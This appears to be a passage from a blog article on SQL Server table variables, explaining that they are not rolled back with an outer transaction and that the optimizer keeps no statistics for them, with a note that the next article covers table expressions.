Unlike a temporary table, a table variable is not part of an outer transaction; rather the transaction scope is limited to the statement level in order to support statement rollback. When you modify a table variable and the statement is aborted, the paticular statement is undone. However, if the outer transaction for tht statement is undone after the statement is finished, the changes will not be undone. Table variables are pretty unique in this respect and we can use this property to our advantage. Because table variables require less locking and logging there are obvious performance benefits

Statistics
The main factor in choosing wheter or not to use table variables is that the query optimizer does not create distribution statistics or maintain accurate cardinality information. Therefore queries against the table variable, will not use an efficient plan which will obviously be a big problem when you work with larger tables. The upside to using table variables is the loss of overhead from calculating these statistics and having to deal with triggered recompilation.

In the next article I'll discuss table expressions, how they work and when you'll want to use these instead of temporary tables and table variables.